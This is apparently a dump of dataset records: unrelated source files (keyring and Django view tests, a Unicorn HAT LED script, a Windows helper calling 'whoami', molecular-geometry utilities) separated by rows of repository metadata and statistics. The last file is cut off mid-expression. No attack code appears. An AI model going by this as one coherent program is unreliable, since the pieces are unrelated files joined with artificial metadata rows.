            keyring, 'delete_password', side_effect=keyring_exc), \
            pytest.raises(KeyringNotAvailable):
        # Code to be tested
        keyring_obj.check_available()
@pytest.mark.skipif(
    not is_keyring_available(), reason="No keyring service available")
def test_keyring_check_available_fail3():
    """
    Keyring.check_available() raises KeyringNotAvailable when the backend
    is a Chainer backend with an empty list of chained backends.
    """
    keyring_obj = Keyring()
    chainer_cls = keyring.backends.chainer.ChainerBackend
    with mock.patch.object(keyring, 'get_keyring', return_value=chainer_cls()), \
            mock.patch.object(chainer_cls, 'backends',
                              new_callable=mock.PropertyMock) as backends_mock:
        backends_mock.return_value = []
        with pytest.raises(KeyringNotAvailable):
            # Code to be tested
            keyring_obj.check_available()
@pytest.mark.skipif(
    not is_keyring_available(), reason="No keyring service available")
def test_keyring_check_available_fail4():
    """
    Keyring.check_available() raises KeyringNotAvailable when the backend
    is the fail backend.
    """
    keyring_obj = Keyring()
    fail_cls = keyring.backends.fail.Keyring
    with mock.patch.object(keyring, 'get_keyring', return_value=fail_cls()), \
            pytest.raises(KeyringNotAvailable):
        # Code to be tested
        keyring_obj.check_available()
@pytest.mark.skipif(
    not is_keyring_available(), reason="No keyring service available")
def test_keyring_check_available_fail5():
    """
    Keyring.check_available() raises KeyringNotAvailable when the backend
    is the null backend.
    """
    keyring_obj = Keyring()
    null_cls = keyring.backends.null.Keyring
    with mock.patch.object(keyring, 'get_keyring', return_value=null_cls()), \
            pytest.raises(KeyringNotAvailable):
        # Code to be tested
        keyring_obj.check_available()
| 31.630728 | 80 | 0.686749 | 1,420 | 11,735 | 5.46831 | 0.111972 | 0.027817 | 0.017514 | 0.03065 | 0.832196 | 0.816227 | 0.791114 | 0.774887 | 0.766388 | 0.752994 | 0 | 0.002077 | 0.220452 | 11,735 | 370 | 81 | 31.716216 | 0.846742 | 0.233916 | 0 | 0.672727 | 0 | 0 | 0.089259 | 0 | 0 | 0 | 0 | 0 | 0.059091 | 1 | 0.072727 | false | 0.118182 | 0.045455 | 0 | 0.118182 | 0.004545 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
6f2601abb37c93b876258d918821ab04fb574e8f | 673 | py | Python | Unicorn-Demonstration/colour.py | unixweb-team/IOT_demonstration | ce5b45e4f93091bee850adfb1b66ceb49b7f026b | [
"MIT"
] | 4 | 2017-11-24T15:24:19.000Z | 2021-01-29T11:23:08.000Z | Unicorn-Demonstration/colour.py | unixweb-team/IOT_demonstration | ce5b45e4f93091bee850adfb1b66ceb49b7f026b | [
"MIT"
] | null | null | null | Unicorn-Demonstration/colour.py | unixweb-team/IOT_demonstration | ce5b45e4f93091bee850adfb1b66ceb49b7f026b | [
"MIT"
] | null | null | null | def red():
import unicornhat as unicorn
import time
unicorn.set_layout(unicorn.AUTO)
unicorn.rotation(0)
unicorn.brightness(0.5)
width,height=unicorn.get_shape()
for y in range(height):
for x in range(width):
unicorn.set_pixel(x,y,255,10,25)
unicorn.show()
time.sleep(0.05)
def blue():
import unicornhat as unicorn
import time
unicorn.set_layout(unicorn.AUTO)
unicorn.rotation(0)
unicorn.brightness(0.5)
width,height=unicorn.get_shape()
for y in range(height):
for x in range(width):
unicorn.set_pixel(x,y,124,0,255)
unicorn.show()
time.sleep(0.05)
| 26.92 | 43 | 0.631501 | 98 | 673 | 4.27551 | 0.326531 | 0.095465 | 0.085919 | 0.119332 | 0.935561 | 0.935561 | 0.825776 | 0.825776 | 0.825776 | 0.825776 | 0 | 0.051485 | 0.249629 | 673 | 24 | 44 | 28.041667 | 0.778218 | 0 | 0 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.166667 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
48bceafcd06f74fb86f689f47fda720eedf95726 | 12,951 | py | Python | BookClub/tests/views/meeting_views/test_delete_meeting_view.py | amir-rahim/BookClubSocialNetwork | b69a07cd33592f700214252a64c7c1c53845625d | [
"MIT"
] | 4 | 2022-02-04T02:11:48.000Z | 2022-03-12T21:38:01.000Z | BookClub/tests/views/meeting_views/test_delete_meeting_view.py | amir-rahim/BookClubSocialNetwork | b69a07cd33592f700214252a64c7c1c53845625d | [
"MIT"
] | 51 | 2022-02-01T18:56:23.000Z | 2022-03-31T15:35:37.000Z | BookClub/tests/views/meeting_views/test_delete_meeting_view.py | amir-rahim/BookClubSocialNetwork | b69a07cd33592f700214252a64c7c1c53845625d | [
"MIT"
] | null | null | null | """Unit testing of the delete meeting view."""
from django.contrib import messages
from django.core.exceptions import ObjectDoesNotExist
from django.test import TestCase, tag
from django.urls import reverse
from BookClub.models import User, Club, ClubMembership, Meeting, Book
from BookClub.tests.helpers import LogInTester
@tag('views', 'meeting', 'delete_meeting')
class DeleteMeetingView(TestCase, LogInTester):
"""Tests for the Delete Meeting view."""
fixtures = [
"BookClub/tests/fixtures/default_users.json",
"BookClub/tests/fixtures/default_clubs.json",
"BookClub/tests/fixtures/default_books.json",
"BookClub/tests/fixtures/default_meetings.json",
]
def setUp(self):
self.organiser = User.objects.get(pk=1)
self.owner = User.objects.get(pk=2)
self.moderator = User.objects.get(pk=3)
self.member = User.objects.get(pk=4)
self.applicant = User.objects.get(pk=5)
self.book = Book.objects.get(pk=1)
self.meeting = Meeting.objects.get(pk=1)
self.club = Club.objects.get(pk=1)
self.url = reverse('delete_meeting',
kwargs={'club_url_name': self.club.club_url_name, 'meeting_id': self.meeting.id})
ClubMembership.objects.create(user=self.organiser, club=self.club,
membership=ClubMembership.UserRoles.MODERATOR)
ClubMembership.objects.create(user=self.owner, club=self.club, membership=ClubMembership.UserRoles.OWNER)
ClubMembership.objects.create(user=self.moderator, club=self.club,
membership=ClubMembership.UserRoles.MODERATOR)
ClubMembership.objects.create(user=self.member, club=self.club, membership=ClubMembership.UserRoles.MEMBER)
ClubMembership.objects.create(user=self.applicant, club=self.club,
membership=ClubMembership.UserRoles.APPLICANT)
def test_delete_meeting_url(self):
self.assertEqual(self.url, f'/club/{self.club.club_url_name}/meetings/{self.meeting.id}/delete/')
def test_get_delete_meeting_redirects_to_meeting_list(self):
"""Test for redirecting user to meeting list when used get method."""
self.client.login(username=self.owner.username, password='Password123')
self.assertTrue(self._is_logged_in())
response = self.client.get(self.url, {'user': self.owner.username})
redirect_url = reverse('meeting_list', kwargs={'club_url_name': self.club.club_url_name})
self.assertRedirects(response, redirect_url, status_code=302, target_status_code=200)
def test_delete_meeting_not_logged_in_redirect(self):
"""Test for a guest unsuccessfully trying to delete a meeting"""
self.assertFalse(self._is_logged_in())
response = self.client.post(self.url)
self.assertEqual(response.status_code, 302)
self.client.post(self.url)
meeting_exists_before = Meeting.objects.filter(pk=self.meeting.id).exists()
self.assertEqual(meeting_exists_before, True)
meeting_exists_after = Meeting.objects.filter(pk=self.meeting.id).exists()
self.assertEqual(meeting_exists_before, meeting_exists_after)
"""Unit tests for user being able to delete a meeting"""
def test_owner_can_delete_meeting(self):
self.client.login(username=self.owner.username, password="Password123")
self.assertTrue(self._is_logged_in())
meeting_exists_before = Meeting.objects.filter(pk=self.meeting.id).exists()
self.assertEqual(meeting_exists_before, True)
response = self.client.post(self.url)
redirect_url = reverse('meeting_list', kwargs={'club_url_name': self.club.club_url_name})
response_message = self.client.get(redirect_url)
messages_list = list(response_message.context['messages'])
self.assertEqual(len(messages_list), 1)
self.assertEqual(messages_list[0].level, messages.SUCCESS)
self.assertRedirects(response, redirect_url, status_code=302, target_status_code=200)
meeting_exists_after = Meeting.objects.filter(pk=self.meeting.id).exists()
self.assertEqual(meeting_exists_after, False)
def test_organiser_can_delete_meeting(self):
self.client.login(username=self.organiser.username, password="Password123")
self.assertTrue(self._is_logged_in())
meeting_exists_before = Meeting.objects.filter(pk=self.meeting.id).exists()
self.assertEqual(meeting_exists_before, True)
response = self.client.post(self.url)
redirect_url = reverse('meeting_list', kwargs={'club_url_name': self.club.club_url_name})
response_message = self.client.get(redirect_url)
messages_list = list(response_message.context['messages'])
self.assertEqual(len(messages_list), 1)
self.assertEqual(messages_list[0].level, messages.SUCCESS)
self.assertRedirects(response, redirect_url, status_code=302, target_status_code=200)
meeting_exists_after = Meeting.objects.filter(pk=self.meeting.id).exists()
self.assertEqual(meeting_exists_after, False)
"""Unit tests for user not being able to delete a valid meeting"""
def test_moderator_cannot_delete_meeting(self):
self.client.login(username=self.moderator.username, password="Password123")
self.assertTrue(self._is_logged_in())
meeting_exists_before = Meeting.objects.filter(pk=self.meeting.id).exists()
self.assertEqual(meeting_exists_before, True)
response = self.client.post(self.url)
redirect_url = reverse('meeting_list', kwargs={'club_url_name': self.club.club_url_name})
response_message = self.client.get(redirect_url)
messages_list = list(response_message.context['messages'])
self.assertEqual(len(messages_list), 1)
self.assertEqual(messages_list[0].level, messages.ERROR)
self.assertRedirects(response, redirect_url, status_code=302, target_status_code=200)
meeting_exists_after = Meeting.objects.filter(pk=self.meeting.id).exists()
self.assertEqual(meeting_exists_before, meeting_exists_after)
def test_member_cannot_delete_meeting(self):
self.client.login(username=self.member.username, password="Password123")
self.assertTrue(self._is_logged_in())
meeting_exists_before = Meeting.objects.filter(pk=self.meeting.id).exists()
self.assertEqual(meeting_exists_before, True)
response = self.client.post(self.url)
redirect_url = reverse('meeting_list', kwargs={'club_url_name': self.club.club_url_name})
response_message = self.client.get(redirect_url)
messages_list = list(response_message.context['messages'])
self.assertEqual(len(messages_list), 1)
self.assertEqual(messages_list[0].level, messages.ERROR)
self.assertRedirects(response, redirect_url, status_code=302, target_status_code=200)
meeting_exists_after = Meeting.objects.filter(pk=self.meeting.id).exists()
self.assertEqual(meeting_exists_before, meeting_exists_after)
def test_applicant_cannot_delete_meeting(self):
self.client.login(username=self.applicant.username, password="Password123")
self.assertTrue(self._is_logged_in())
meeting_exists_before = Meeting.objects.filter(pk=self.meeting.id).exists()
self.assertEqual(meeting_exists_before, True)
response = self.client.post(self.url)
redirect_url = reverse('meeting_list', kwargs={'club_url_name': self.club.club_url_name})
response_message = self.client.get(reverse('club_dashboard', kwargs={'club_url_name': self.club.club_url_name}))
messages_list = list(response_message.context['messages'])
self.assertEqual(len(messages_list), 1)
self.assertEqual(messages_list[0].level, messages.ERROR)
self.assertRedirects(response, redirect_url, status_code=302, target_status_code=302)
meeting_exists_after = Meeting.objects.filter(pk=self.meeting.id).exists()
self.assertEqual(meeting_exists_before, meeting_exists_after)
"""Unit tests for user not being able to delete an invalid meeting"""
def test_owner_delete_invalid_meeting(self):
self.client.login(username=self.owner.username, password='Password123')
response = self.client.post(reverse('delete_meeting',
kwargs={'club_url_name': self.club.club_url_name,
'meeting_id': self.meeting.id + 9999}))
redirect_url = reverse('meeting_list', kwargs={'club_url_name': self.club.club_url_name})
with self.assertRaises(ObjectDoesNotExist):
Meeting.objects.get(id=self.meeting.id + 9999).exists()
response_message = self.client.get(redirect_url)
messages_list = list(response_message.context['messages'])
self.assertEqual(len(messages_list), 1)
self.assertEqual(messages_list[0].level, messages.ERROR)
self.assertRedirects(response, redirect_url, status_code=302, target_status_code=200)
def test_organiser_delete_invalid_meeting(self):
self.client.login(username=self.organiser.username, password='Password123')
response = self.client.post(reverse('delete_meeting',
kwargs={'club_url_name': self.club.club_url_name,
'meeting_id': self.meeting.id + 9999}))
redirect_url = reverse('meeting_list', kwargs={'club_url_name': self.club.club_url_name})
with self.assertRaises(ObjectDoesNotExist):
Meeting.objects.get(id=self.meeting.id + 9999).exists()
response_message = self.client.get(redirect_url)
messages_list = list(response_message.context['messages'])
self.assertEqual(len(messages_list), 1)
self.assertEqual(messages_list[0].level, messages.ERROR)
self.assertRedirects(response, redirect_url, status_code=302, target_status_code=200)
def test_moderator_delete_invalid_meeting(self):
self.client.login(username=self.moderator.username, password='Password123')
response = self.client.post(reverse('delete_meeting',
kwargs={'club_url_name': self.club.club_url_name,
'meeting_id': self.meeting.id + 9999}))
redirect_url = reverse('meeting_list', kwargs={'club_url_name': self.club.club_url_name})
with self.assertRaises(ObjectDoesNotExist):
Meeting.objects.get(id=self.meeting.id + 9999).exists()
response_message = self.client.get(redirect_url)
messages_list = list(response_message.context['messages'])
self.assertEqual(len(messages_list), 1)
self.assertEqual(messages_list[0].level, messages.ERROR)
self.assertRedirects(response, redirect_url, status_code=302, target_status_code=200)
def test_member_delete_invalid_meeting(self):
self.client.login(username=self.member.username, password='Password123')
response = self.client.post(reverse('delete_meeting',
kwargs={'club_url_name': self.club.club_url_name,
'meeting_id': self.meeting.id + 9999}))
redirect_url = reverse('meeting_list', kwargs={'club_url_name': self.club.club_url_name})
with self.assertRaises(ObjectDoesNotExist):
Meeting.objects.get(id=self.meeting.id + 9999).exists()
response_message = self.client.get(redirect_url)
messages_list = list(response_message.context['messages'])
self.assertEqual(len(messages_list), 1)
self.assertEqual(messages_list[0].level, messages.ERROR)
self.assertRedirects(response, redirect_url, status_code=302, target_status_code=200)
def test_applicant_delete_invalid_meeting(self):
self.client.login(username=self.applicant.username, password='Password123')
response = self.client.post(reverse('delete_meeting',
kwargs={'club_url_name': self.club.club_url_name,
'meeting_id': self.meeting.id + 9999}))
redirect_url = reverse('meeting_list', kwargs={'club_url_name': self.club.club_url_name})
with self.assertRaises(ObjectDoesNotExist):
Meeting.objects.get(id=self.meeting.id + 9999).exists()
response_message = self.client.get(reverse('club_dashboard', kwargs={'club_url_name': self.club.club_url_name}))
messages_list = list(response_message.context['messages'])
self.assertEqual(len(messages_list), 1)
self.assertEqual(messages_list[0].level, messages.ERROR)
self.assertRedirects(response, redirect_url, status_code=302, target_status_code=302)
| 58.076233 | 120 | 0.693614 | 1,564 | 12,951 | 5.516624 | 0.076726 | 0.031641 | 0.049722 | 0.034771 | 0.866829 | 0.828813 | 0.811892 | 0.806096 | 0.806096 | 0.785814 | 0 | 0.016294 | 0.194425 | 12,951 | 222 | 121 | 58.337838 | 0.810697 | 0.015288 | 0 | 0.686486 | 0 | 0 | 0.081253 | 0.018898 | 0 | 0 | 0 | 0 | 0.308108 | 1 | 0.075676 | false | 0.059459 | 0.032432 | 0 | 0.118919 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
48d02fb8e534306964ff21108cc051fb3cd1e92d | 90 | py | Python | InstagramAPI/__init__.py | pauluskim/Quixotic_DATA | c360c21514193b3fbf4aa9572c90058e19403b1b | [
"MIT"
] | null | null | null | InstagramAPI/__init__.py | pauluskim/Quixotic_DATA | c360c21514193b3fbf4aa9572c90058e19403b1b | [
"MIT"
] | null | null | null | InstagramAPI/__init__.py | pauluskim/Quixotic_DATA | c360c21514193b3fbf4aa9572c90058e19403b1b | [
"MIT"
] | null | null | null | #from InstagramAPI.InstagramAPI import InstagramAPI
from InstagramAPI import InstagramAPI
| 30 | 51 | 0.888889 | 9 | 90 | 8.888889 | 0.333333 | 0.4 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 90 | 2 | 52 | 45 | 0.97561 | 0.555556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d28a5cfdaa80abfb05b0abc6b4fa3461a021c7e0 | 182 | py | Python | python/dev/download/windows_info.py | Shail-Shouryya/automate_YouTube-Channel-Videos-List | b63bbebb7caacc5e99ebf5dc95387d505069953d | [
"Apache-2.0"
] | 26 | 2021-01-31T11:52:10.000Z | 2021-08-01T17:24:55.000Z | python/dev/download/windows_info.py | Shail-Shouryya/automate_YouTube-Channel-Videos-List | b63bbebb7caacc5e99ebf5dc95387d505069953d | [
"Apache-2.0"
] | 7 | 2020-06-01T13:14:15.000Z | 2021-01-09T20:58:17.000Z | python/dev/download/windows_info.py | Shail-Shouryya/automate_YouTube-Channel-Videos-List | b63bbebb7caacc5e99ebf5dc95387d505069953d | [
"Apache-2.0"
] | 6 | 2021-03-18T05:46:51.000Z | 2021-07-19T07:40:37.000Z | import subprocess
def get_drive_letter():
    """Return the drive letter of the current directory (Windows `%CD%`)."""
    current_dir = subprocess.getoutput('echo %CD%')
    # everything before the first ':' is the drive letter, e.g. 'C'
    return current_dir.split(':')[0]
def get_user_name():
    """Return the user part of `whoami` output (Windows DOMAIN\\user form)."""
    whoami_output = subprocess.getoutput('whoami')
    # index 1 is the user name after the domain/host prefix
    return whoami_output.split('\\')[1]
| 20.222222 | 58 | 0.686813 | 23 | 182 | 5.26087 | 0.695652 | 0.099174 | 0.413223 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0125 | 0.120879 | 182 | 8 | 59 | 22.75 | 0.74375 | 0 | 0 | 0 | 0 | 0 | 0.098901 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | true | 0 | 0.2 | 0.4 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
d2c108a480fe9b0cf2386dd5252d7f133921f586 | 218,115 | py | Python | scripts/utils.py | RPirie96/RGMolSA | 72648700d3b29aa37414b27b8a213b1c5d377302 | [
"MIT"
] | 2 | 2022-01-14T13:01:09.000Z | 2022-01-17T16:15:53.000Z | scripts/utils.py | RPirie96/RGMolSA | 72648700d3b29aa37414b27b8a213b1c5d377302 | [
"MIT"
] | null | null | null | scripts/utils.py | RPirie96/RGMolSA | 72648700d3b29aa37414b27b8a213b1c5d377302 | [
"MIT"
] | 2 | 2022-01-17T16:16:01.000Z | 2022-03-08T07:58:00.000Z | """
script of helper functions
"""
from collections import namedtuple
import numpy as np
import math
from scipy.spatial import distance
def get_chain(no_atoms, level_mat, adjacency_matrix, sphere, level):
    """
    Trace the path from the base sphere out to a given sphere.

    @param no_atoms: total number of spheres in the molecule
    @param level_mat: matrix flagging which spheres sit at each level
    @param adjacency_matrix: sphere/sphere intersection matrix (1 = touching)
    @param sphere: index of the sphere the chain should end at
    @param level: level of ``sphere`` relative to the base sphere
    @return: chain - path through molecule from base sphere
    """
    # one entry per level, from the base sphere (index 0) up to `sphere`
    chain = np.zeros(level + 1, dtype=int)
    chain[level] = sphere
    current_sphere = sphere
    current_level = level
    while current_level > 0:
        for candidate in range(no_atoms):
            # descend to an adjacent sphere sitting one level closer to the base
            if (level_mat[current_level - 1][candidate] == 1
                    and adjacency_matrix[current_sphere][candidate] == 1):
                current_sphere = candidate
                chain[current_level - 1] = candidate
                current_level -= 1
    return chain
def get_m_rot(vector):
    """
    Build the SO(3) matrix carrying (0, 0, 1) onto ``vector``.

    @param vector: unit vector (x, y, z); z = -1 would divide by zero here
    @return: m_rot - 3x3 rotation matrix as a numpy array
    """
    v_x, v_y, v_z = vector[0], vector[1], vector[2]
    denom = 1 + v_z
    return np.array(
        [
            [1 - ((v_x ** 2) / denom), -v_x * v_y / denom, v_x],
            [-v_x * v_y / denom, 1 - ((v_y ** 2) / denom), v_y],
            [-v_x, -v_y, v_z],
        ]
    )
# helper functions for performing piecewise stereographic projection
# if we rotate (0,0,1) onto (v_1,v_2,v_3) this induces an element of PSU(2) [[alpha, beta],[-conj(beta), alpha]]
def alpha_coefficient(vector):
    """
    Alpha coefficient of the PSU(2) element induced by rotating (0,0,1)
    onto ``vector``.

    @param vector: unit vector (x, y, z)
    @return: alpha (0 at the antipode z = -1)
    """
    z_shift_sq = (vector[2] + 1) ** 2
    if z_shift_sq > 10 ** (-9):
        return math.sqrt((1 + vector[2]) / 2)
    return 0
def beta_coefficient(vector):
    """
    Beta coefficient of the PSU(2) element induced by rotating (0,0,1)
    onto ``vector``.

    @param vector: unit vector (x, y, z)
    @return: beta (the constant 1j at the antipode z = -1)
    """
    z_shift_sq = (vector[2] + 1) ** 2
    if z_shift_sq > 10 ** (-9):
        return -math.sqrt(1 / (2 * (1 + vector[2]))) * complex(vector[0], vector[1])
    return 1j
def t_circle(alpha, beta, gamma, delta, c, r_rel):
    """
    Centre and radius of the image of the circle |z - c| = r_rel under the
    Mobius transformation z --> (alpha*z + beta)/(gamma*z + delta).

    @param alpha: Mobius coefficient (numerator, z term)
    @param beta: Mobius coefficient (numerator, constant term)
    @param gamma: Mobius coefficient (denominator, z term)
    @param delta: Mobius coefficient (denominator, constant term)
    @param c: centre of the source circle
    @param r_rel: radius of the source circle
    @return: [cent, radius] of the image circle
    """
    numer_shift = beta + (c * alpha)
    denom_shift = delta + (c * gamma)
    scale = (abs(denom_shift) ** 2) - (r_rel * abs(gamma)) ** 2
    cent = (
        (numer_shift * np.conj(denom_shift)) - (r_rel * r_rel * alpha * np.conj(gamma))
    ) / scale
    k = (((r_rel * abs(alpha)) ** 2) - (abs(numer_shift)) ** 2) / scale
    radius = math.sqrt(abs(k + abs(cent) ** 2))
    return [cent, radius]
def transform_v2(a, r):
    """
    SU(2)-style matrix of the Mobius transformation used to recentre the
    disc |z - a| < r.

    @param a: centre of the disc (complex)
    @param r: radius of the disc
    @return: transform - 2x2 numpy array [[alpha, beta], [-conj(beta), alpha]]
             (rows swapped when the candidate maps the wrong disc)
    """
    shift = abs(a) ** 2 - r ** 2 - 1
    beta = (shift + math.sqrt(shift ** 2 + 4 * abs(a) ** 2)) / (-2 * np.conj(a))
    # normalise so that |alpha|^2 + |beta|^2 = 1
    norm = np.sqrt(1 + abs(beta) ** 2)
    alpha = 1 / norm
    beta = beta / norm
    if abs((-beta / alpha) - a) > r:
        # the fixed point -beta/alpha fell outside the disc; use the swapped form
        return np.array([[np.conj(beta), alpha], [-alpha, beta]])
    return np.array([[alpha, beta], [-np.conj(beta), alpha]])
def cut_10(inputs, error, lev_keep=11):
    """
    Drop every sphere at level >= ``lev_keep`` (removes the "crunching" of
    deep spheres that triggers LinAlgError).

    @param inputs: namedtuple with no_atoms, radii, centres, adjacency_matrix
    @param error: namedtuple carrying sphere_levels_vec (level of each sphere)
    @param lev_keep: first level to discard; default 11 keeps levels 0-10
    @return: new inputs namedtuple with the deep spheres omitted
    """
    levels = error.sphere_levels_vec
    total = inputs.no_atoms

    # 1 = keep the sphere, 0 = cut it
    keep = [1 if levels[sphere] < lev_keep else 0 for sphere in range(total)]
    kept = [sphere for sphere in range(total) if keep[sphere] == 1]
    size = len(kept)

    new_centres = np.zeros((size, 3), dtype=float)
    new_radii = np.zeros(size, dtype=float)
    new_adjacency = np.zeros((size, size), dtype=int)

    for row, sphere in enumerate(kept):
        new_centres[row][0] = inputs.centres[sphere][0]
        new_centres[row][1] = inputs.centres[sphere][1]
        new_centres[row][2] = inputs.centres[sphere][2]
        new_radii[row] = inputs.radii[sphere]
        for col, sphere_2 in enumerate(kept):
            new_adjacency[row, col] = inputs.adjacency_matrix[sphere, sphere_2]

    new_inputs = namedtuple(
        "input", ["no_atoms", "radii", "centres", "adjacency_matrix"]
    )
    return new_inputs(
        no_atoms=size,
        radii=new_radii,
        centres=new_centres,
        adjacency_matrix=new_adjacency,
    )
def get_score(query, test, query_id=None, test_id=None):
    """
    Normalised Bray-Curtis similarity between two descriptor vectors.

    @param query: descriptor vector of the query molecule
    @param test: descriptor vector of the molecule compared against
    @param query_id: optional identifier of the query molecule
    @param test_id: optional identifier of the test molecule
    @return: "self" when both ids are supplied and equal, otherwise the
             similarity 1 - braycurtis(query, test) rounded to 3dp
    """
    if query_id is not None and query_id == test_id:
        return "self"  # marker for self comparison
    return round((1 - distance.braycurtis(query, test)), 3)  # return score to 3dp
def vol_integral(a, b, c, x):
    """
    Radial integral used when assembling the a_matrix (Rayleigh-Ritz
    approximation of the spectrum).

    @param a: complex coefficient (presumably from the piecewise Mobius
              map — TODO confirm against callers)
    @param b: real coefficient in the quadratic form (|a|^2 + b)
    @param c: multiplicative scale factor applied to the result
    @param x: upper limit of the radial variable
    @return: vol_integral value
    """
    mod_a_sq = a * np.conj(a)
    root_inner = np.sqrt((mod_a_sq + b) ** 2)
    root_outer = np.sqrt(
        (mod_a_sq + b) ** 2 - 2 * mod_a_sq * x ** 2 + 2 * b * x ** 2 + x ** 4
    )
    inv_diff = 1 / root_inner - 1 / root_outer
    core = (1 / 4) * (
        inv_diff + x ** 2 / (b * root_outer) + (mod_a_sq * inv_diff) / b
    )
    return 4 * np.pi * c * core
def x_integral(a, b, c, x):
    """
    Closed-form integral used in computing the a_matrix (Rayleigh-Ritz
    approximation of the spectrum); this is the x-weighted moment term.

    The expression is a machine-derived antiderivative (presumably exported
    from a CAS — TODO confirm); do not simplify by hand.

    @param a: complex coefficient (presumably from the piecewise Mobius
              map — TODO confirm against callers)
    @param b: real coefficient in the quadratic form (|a|^2 + b)
    @param c: multiplicative scale factor applied to the result
    @param x: upper limit of the radial variable
    @return: x_integral value; 0 when conj(a) is numerically zero
    """
    a_conj = np.conj(a)
    # helper variables to tidy up function
    k_0 = a * a_conj
    k_1 = np.sqrt((k_0 + b) ** 2)
    k_2 = np.sqrt((k_0 + b) ** 2 - 2 * k_0 * x ** 2 + 2 * b * x ** 2 + x ** 4)
    k_3 = a ** 2 * a_conj ** 2
    # the closed form divides by k_0 = |a|^2, so fall back to 0 when a ~ 0
    if abs(a_conj) >= 0.00000001:
        ret = (
            (a + a_conj)
            * (
                np.sqrt(1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2)
                * (
                    a ** 3 * a_conj ** 3
                    + k_3 * (1 + b - x ** 2)
                    + (-1 + b) * (-(b ** 2) - b * x ** 2 + k_1 * k_2)
                    - k_0 * (b ** 2 + x ** 2 + 2 * b * (-1 + x ** 2) + k_1 * k_2)
                )
                + 4 * k_0 * b * k_2
                * np.arctanh(
                    (k_3 + (-1 + b) * b + a * (a_conj + 2 * a_conj * b))
                    / (k_1 * np.sqrt(k_3 + (-1 + b) ** 2 + 2 * k_0 * (1 + b)))
                )
                - 4 * k_0 * b * k_2
                * np.arctanh(
                    (
                        k_3 + b ** 2 - x ** 2
                        + k_0 * (1 + 2 * b - x ** 2)
                        + b * (-1 + x ** 2)
                    )
                    / (
                        np.sqrt(k_3 + (-1 + b) ** 2 + 2 * k_0 * (1 + b))
                        * np.sqrt(k_3 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)
                    )
                )
            )
        ) / (
            2 * k_0 * b
            * (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (3 / 2)
            * np.sqrt(k_3 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)
        )
        return -2 * np.pi * c * ret
    else:
        return 0
def z_integral(a, b, c, x):
    """
    Closed-form integral used in computing the a_matrix (Rayleigh-Ritz
    approximation of the spectrum); this is the z-weighted moment term.

    Three algebraic regimes are handled separately: generic a, a ~ 0 with
    b away from 1, and the degenerate a ~ 0, b ~ 1 limit. The expressions
    are machine-derived antiderivatives (presumably exported from a CAS —
    TODO confirm); do not simplify by hand.

    @param a: complex coefficient (presumably from the piecewise Mobius
              map — TODO confirm against callers)
    @param b: real coefficient in the quadratic form (|a|^2 + b)
    @param c: multiplicative scale factor applied to the result
    @param x: upper limit of the radial variable
    @return: z_integral value
    """
    a_conj = np.conj(a)
    # helper variables to tidy up function
    k_0 = a * a_conj
    k_1 = np.sqrt((k_0 + b) ** 2)
    k_2 = np.sqrt((k_0 + b) ** 2 - 2 * k_0 * x ** 2 + 2 * b * x ** 2 + x ** 4)
    k_3 = a ** 2 * a_conj ** 2
    k_4 = np.sqrt(1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2)
    k_12 = k_1 * k_2
    k_14 = k_1 * k_4
    k_24 = k_2 * k_4
    # generic closed form; requires a bounded away from 0
    if abs(a_conj) >= 0.00000001:
        ret = (
            (-a) * a_conj * k_14
            + a ** 3 * a_conj ** 3 * k_14
            - b * k_14
            + 4 * k_0 * b * k_14
            + 3 * k_3 * b * k_14
            + 4 * b ** 2 * k_14
            + 3 * k_0 * b ** 2 * k_14
            + b ** 3 * k_14
            + k_14 * x ** 2
            - k_3 * k_14 * x ** 2
            + 4 * b * k_14 * x ** 2
            - 2 * k_0 * b * k_14 * x ** 2
            - b ** 2 * k_14 * x ** 2
            + k_0 * k_24
            - a ** 3 * a_conj ** 3 * k_24
            + b * k_24
            - 4 * k_0 * b * k_24
            - 3 * k_3 * b * k_24
            - 4 * b ** 2 * k_24
            - 3 * k_0 * b ** 2 * k_24
            - b ** 3 * k_24
            + 4 * b * (-1 + k_0 + b) * k_12 * np.log(k_0 - b + (k_0 + b) ** 2 + k_14)
            + 4 * b * (-1 + k_0 + b) * k_12 * np.log(1 + x ** 2)
            + 4 * b * k_12
